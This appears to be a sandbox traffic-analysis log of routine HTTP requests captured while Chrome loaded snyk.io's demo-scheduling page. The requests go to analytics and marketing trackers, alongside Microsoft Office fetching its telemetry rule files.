Source: global trafficHTTP traffic detected: GET /next-integrations/integrations/google-tag-manager/2.5.1/google-tag-manager.dynamic.js.gz HTTP/1.1Host: cdn.segment.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /api/events/pageview?accountId=2025&url=aHR0cHM6Ly9zbnlrLmlvL3NjaGVkdWxlLWEtZGVtby8%3D&cookie=17297993867885496&referral=&variant=&otwId=&otwItemId=&streamId=&streamContentId=&vid=2025:17297993867885496&r=1729799389500 HTTP/1.1Host: trackingapi.trendemon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: trd_gavid_2025=17297993867885496; trd_gvid=17297993867885496; trd_vid_2025=2025%3A17297993867885496
Source: global trafficHTTP traffic detected: GET /api/events/client-app/multiple?accountId=2025&url=aHR0cHM6Ly9zbnlrLmlvL3NjaGVkdWxlLWEtZGVtby8%3D&app=sixsense&names=%5B%5D&vid=2025:17297993867885496&r=1729799389593 HTTP/1.1Host: trackingapi.trendemon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: trd_gavid_2025=17297993867885496; trd_gvid=17297993867885496; trd_vid_2025=2025%3A17297993867885496
Source: global trafficHTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /api/experience/personal-stream?AccountId=2025&ClientUrl=https%3A%2F%2Fsnyk.io%2Fschedule-a-demo%2F&MarketingAutomationCookie=&ExcludedStreamsJson=%5B%5D&callback=jsonp386460&vid=2025:17297993867885496 HTTP/1.1Host: trackingapi.trendemon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: trd_gavid_2025=17297993867885496; trd_gvid=17297993867885496; trd_vid_2025=2025%3A17297993867885496
Source: global trafficHTTP traffic detected: GET /v1/p HTTP/1.1Host: api.segment.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /next-integrations/integrations/google-analytics/2.18.5/google-analytics.dynamic.js.gz HTTP/1.1Host: cdn.segment.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /next-integrations/integrations/linkedin-insight-tag/1.0.1/linkedin-insight-tag.dynamic.js.gz HTTP/1.1Host: cdn.segment.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /next-integrations/integrations/vendor/commons.a61d7bea37d2de5d4b69.js.gz HTTP/1.1Host: cdn.segment.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /api/events/client-app/multiple?accountId=2025&url=aHR0cHM6Ly9zbnlrLmlvL3NjaGVkdWxlLWEtZGVtby8%3D&app=sixsense&names=%5B%5D&vid=2025:17297993867885496&r=1729799389593 HTTP/1.1Host: trackingapi.trendemon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: trd_gavid_2025=17297993867885496; trd_gvid=17297993867885496; trd_vid_2025=2025%3A17297993867885496
Source: global trafficHTTP traffic detected: GET /v1/t HTTP/1.1Host: api.segment.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /next-integrations/integrations/google-tag-manager/2.5.1/google-tag-manager.dynamic.js.gz HTTP/1.1Host: cdn.segment.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /api/events/pageview?accountId=2025&url=aHR0cHM6Ly9zbnlrLmlvL3NjaGVkdWxlLWEtZGVtby8%3D&cookie=17297993867885496&referral=&variant=&otwId=&otwItemId=&streamId=&streamContentId=&vid=2025:17297993867885496&r=1729799389500 HTTP/1.1Host: trackingapi.trendemon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: trd_gavid_2025=17297993867885496; trd_gvid=17297993867885496; trd_vid_2025=2025%3A17297993867885496
Source: global trafficHTTP traffic detected: GET /api/experience/personal-stream?AccountId=2025&ClientUrl=https%3A%2F%2Fsnyk.io%2Fschedule-a-demo%2F&MarketingAutomationCookie=&ExcludedStreamsJson=%5B%5D&callback=jsonp386460&vid=2025:17297993867885496 HTTP/1.1Host: trackingapi.trendemon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: trd_gavid_2025=17297993867885496; trd_gvid=17297993867885496; trd_vid_2025=2025%3A17297993867885496
Source: global trafficHTTP traffic detected: GET /api/experience/personal?AccountId=2025&ClientUrl=https%3A%2F%2Fsnyk.io%2Fschedule-a-demo%2F&MarketingAutomationCookie=&ExcludeUnitsJson=%5B%5D&streamId=&callback=jsonp769920&vid=2025:17297993867885496 HTTP/1.1Host: trackingapi.trendemon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: trd_gavid_2025=17297993867885496; trd_gvid=17297993867885496; trd_vid_2025=2025%3A17297993867885496
Source: global trafficHTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /api/experience/personal-embedded?AccountId=2025&ClientUrl=https%3A%2F%2Fsnyk.io%2Fschedule-a-demo%2F&MarketingAutomationCookie=&Ids=%5B%5D&Groups=%5B%5D&StreamId=&callback=jsonp942139&vid=2025:17297993867885496 HTTP/1.1Host: trackingapi.trendemon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: trd_gavid_2025=17297993867885496; trd_gvid=17297993867885496; trd_vid_2025=2025%3A17297993867885496
Source: global trafficHTTP traffic detected: GET /api/experience/personal?AccountId=2025&ClientUrl=https%3A%2F%2Fsnyk.io%2Fschedule-a-demo%2F&MarketingAutomationCookie=&ExcludeUnitsJson=%5B%5D&streamId=&callback=jsonp769920&vid=2025:17297993867885496 HTTP/1.1Host: trackingapi.trendemon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: trd_gavid_2025=17297993867885496; trd_gvid=17297993867885496; trd_vid_2025=2025%3A17297993867885496
Source: global trafficHTTP traffic detected: GET /images/closex.png HTTP/1.1Host: pic.trendemon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tasks_logo/2025/739b36d47655d6271db0356af0e12261.png HTTP/1.1Host: pic.trendemon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /next-integrations/integrations/vendor/commons.a61d7bea37d2de5d4b69.js.gz HTTP/1.1Host: cdn.segment.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /api/experience/personal-embedded?AccountId=2025&ClientUrl=https%3A%2F%2Fsnyk.io%2Fschedule-a-demo%2F&MarketingAutomationCookie=&Ids=%5B%5D&Groups=%5B%5D&StreamId=&callback=jsonp942139&vid=2025:17297993867885496 HTTP/1.1Host: trackingapi.trendemon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: trd_gavid_2025=17297993867885496; trd_gvid=17297993867885496; trd_vid_2025=2025%3A17297993867885496
Source: global trafficHTTP traffic detected: GET /images/closex.png HTTP/1.1Host: pic.trendemon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /tasks_logo/2025/739b36d47655d6271db0356af0e12261.png HTTP/1.1Host: pic.trendemon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /zi-tag.js HTTP/1.1Host: js.zi-scripts.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /include/1729799400000/4479srg8vkz5.js HTTP/1.1Host: js.driftt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /zi-tag.js HTTP/1.1Host: js.zi-scripts.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /j/collect?t=dc&aip=1&_r=3&v=1&_v=j101&tid=UA-69111857-1&cid=1178466141.1729799377&jid=1335744215&gjid=1707489592&_gid=1980384195.1729799395&_u=aCDAgEADQAAAAGgCIAD~&z=1959245756 HTTP/1.1Host: stats.g.doubleclick.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: test_cookie=CheckForPermission
Source: global trafficHTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /unified/v1/master/getSubscriptions HTTP/1.1Host: js.zi-scripts.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"Content-Type: application/jsonsec-ch-ua-mobile: ?0Authorization: Bearer f1c26645901679926219User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36visited_url: https://snyk.io/schedule-a-demo/Accept: */*Origin: https://snyk.ioSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /page-tracking/intentsify-sync/https%3A%2F%2Fsnyk.io%2Fschedule-a-demo%2F HTTP/1.1Host: tracking.intentsify.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
